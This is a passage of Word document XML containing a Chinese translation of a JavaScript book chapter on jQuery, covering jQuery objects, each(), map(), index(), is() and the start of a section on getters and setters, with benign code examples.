        <w:t>节中的例子</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>那里的所有例子传递给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>时都</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可以正常工作。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>支持的具体选择器语法会在</w:t>
      </w:r>
      <w:r>
        <w:t>19.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节详述。本节不会聚焦于那些高级选择器的细节，而会首先来看看可以如何处理查询结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值是一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象是类数组：它们拥有</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性和介于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>length-1</w:t>
      </w:r>
      <w:r>
        <w:t>之间的数值属性。（请查看</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节获取类数组对象的更多信息</w:t>
      </w:r>
      <w:r>
        <w:t>。）这意味着可以用标准的数组标识方括号来访问</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("body").length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t>文档只有唯一一个</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("body")[0]//</w:t>
      </w:r>
      <w:r>
        <w:t>等于</w:t>
      </w:r>
      <w:r>
        <w:t>document.body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不想把数组标识用在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象上，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>size()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来替代</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，用</w:t>
      </w:r>
      <w:r>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来替代方括号索引。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>toArray()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来将</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象转化为真实数组。除了</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象还有三个挺有趣的属性。</w:t>
      </w:r>
      <w:r>
        <w:t>selector</w:t>
      </w:r>
      <w:r>
        <w:t>属性是创建</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象时的选择器字</w:t>
      </w:r>
      <w:r>
        <w:t>符串（如果有的话）。</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>属性是上下文对象，是传递给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的第二参数，如果没有传递的话，默认是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。最后，所有</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象都有一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>jquery</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，检测该属性是否存在可以简单快捷地将</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象与其他类数组对象区分开来。</w:t>
      </w:r>
      <w:r>
        <w:t>jquery</w:t>
      </w:r>
      <w:r>
        <w:t>属性值是字符串形式的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>版本号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>document body</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bodyscripts=$("script",document.body);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bodyscripts.selector//</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bodyscripts.context//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>document.body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bodyscripts.jquery//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"1.4.2"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>函数与</w:t>
      </w:r>
      <w:r>
        <w:t>15.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节中描述的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似：两者都用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器作为参数，并且返回类数组对象来存放匹配选择器的的元素。在支持</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>实现会调用</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，然而，在代码中</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>代替</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>依旧是很好的选择：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>在新近的浏览器中才实现。</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>在新、老浏览器中都能工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过手动实现选择，因此</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>支持的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>选择器可以用在所有浏览器中，而不仅是那些支持</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·$()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的类数组对象（</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象）比</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的类数组对象（</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>）更加有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>想要遍历</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的所有元素时，可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来代替</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环。</w:t>
      </w:r>
      <w:r>
        <w:t>each(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>方法有点类似</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5(ES5)</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>forEac</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>h()</w:t>
      </w:r>
      <w:r>
        <w:t>数组方法。它接受一个回调函数作为唯一参数，然后它对</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的每一个元素（按照在文档中的顺序）调用回调函数。回调函数作为匹配元素的方法来调用，因此在回调函数里</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字指代</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还会将索引值和该元素作为第一个和第二个参数传递给回调函数。注意：</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>和第二参数都是原生文档元素，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象；如果想使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法来操作该元素，需要先用</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>封装它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>e ach()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>有一个显著区别：如果回调函数在任一个元素上返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，遍历将在该元素后中止（这就像在普通循环中使用</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>关键字一样）。</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>返回调用自身的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，因此它可以用于链式调用。下面是个例子（使用的</w:t>
      </w:r>
      <w:r>
        <w:t>prepend()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将在</w:t>
      </w:r>
      <w:r>
        <w:t>19.3</w:t>
      </w:r>
      <w:r>
        <w:t>节阐述）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>给文档中的</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>元素标号，从开始一直到</w:t>
      </w:r>
      <w:r>
        <w:t>div#last</w:t>
      </w:r>
      <w:r>
        <w:t>（包含边界值）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").each(function(idx){//</w:t>
      </w:r>
      <w:r>
        <w:t>找到所有</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>元素，然后遍历它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(this).prepend(idx+":");//</w:t>
      </w:r>
      <w:r>
        <w:t>在每一个元</w:t>
      </w:r>
      <w:r>
        <w:t>素前面插入索引值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.id==="last")return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>碰到</w:t>
      </w:r>
      <w:r>
        <w:t>#last</w:t>
      </w:r>
      <w:r>
        <w:t>元素时终止</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尽管</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>方法很强大，但用得并不多，因为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法通常隐式遍历匹配的元素集并操作它们。需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>的典型场景是</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要用不同的方式来操作匹配的元素。即便如此，也不总需要调用</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>，因为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的一些方法允许传递回调函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>数组方法规范化前，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库就已经存在了。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了几个方法，其功能和</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>方法的功能类似。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype.map()</w:t>
      </w:r>
      <w:r>
        <w:t>方法很相近。它接受回调函数作为参数，并为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的每一个元素都调用回调函数，同时将回调函数的返回值收集起来，并将这些返回值封装成一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象返回。</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>调用回调函数的方式和</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>方法相同：元素作为</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值和第二参数传入，元素的索引值作为第一参数传入。如果回调函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefine</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>，该值将被忽略，在本次回调中不会有任何新元素添加到新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中。如果回调函数返回数组或类数组对象（比如</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象），将会扁平化它并将其中的元素一个个添加到新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中。注意：由</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象可以不包含文档元素，但它依旧可以像类数组对象一样使用。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>找到所有标题元素，映射到它们的</w:t>
      </w:r>
      <w:r>
        <w:t>id,</w:t>
      </w:r>
      <w:r>
        <w:t>并转化为真实数组，然后排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(":header").map(function(){return this.id;}).toArray().sort();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>each(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>之外，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的另一个基础方法是</w:t>
      </w:r>
      <w:r>
        <w:t>index()</w:t>
      </w:r>
      <w:r>
        <w:t>。该方法接受一个元素作为参数，返回值是该元素在此</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的索引值，如果找不到的话，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。显然，受</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的典型风格影响，</w:t>
      </w:r>
      <w:r>
        <w:t>index()</w:t>
      </w:r>
      <w:r>
        <w:t>方法有多个重载版本。如果传递一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象作为参数，</w:t>
      </w:r>
      <w:r>
        <w:t>index()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会对该对象的第一个元素进行搜索。如果传入的是字符串，</w:t>
      </w:r>
      <w:r>
        <w:t>index()</w:t>
      </w:r>
      <w:r>
        <w:t>会把它当成</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器，并返回该</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中匹配该选择器的一组元素中第一个元素的索引值。如果什么参数都不传入，</w:t>
      </w:r>
      <w:r>
        <w:t>index()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回该</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中第一个毗邻元素的索引值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里要讨论的最后一个通用的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法是</w:t>
      </w:r>
      <w:r>
        <w:t>is()</w:t>
      </w:r>
      <w:r>
        <w:t>。它接受一个选择器作为参数，如果选中元素中至少有一个匹配该选择器时，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。可以在</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>回调函数中使用它，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").each(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>对于每一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if($(this).is(":hidden"))return;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过隐藏元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对可见元素做点什么</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465" w:name="19_2_jQueryDe_getterHe_setter"/>
      <w:r>
        <w:t>19.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象上最简单、最常见的操作是获取（</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>）或设置（</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性、</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式、元素内容和位置高宽的值。该节讲述这</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>些方法。首先，让我们对</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法有个概要理解：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>使用同一个方法既当</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>用又做</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>用，而不是定义一对方法。如果传入一个新值给该方法，则它设置此值；如果没指定值，则它返回当前值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
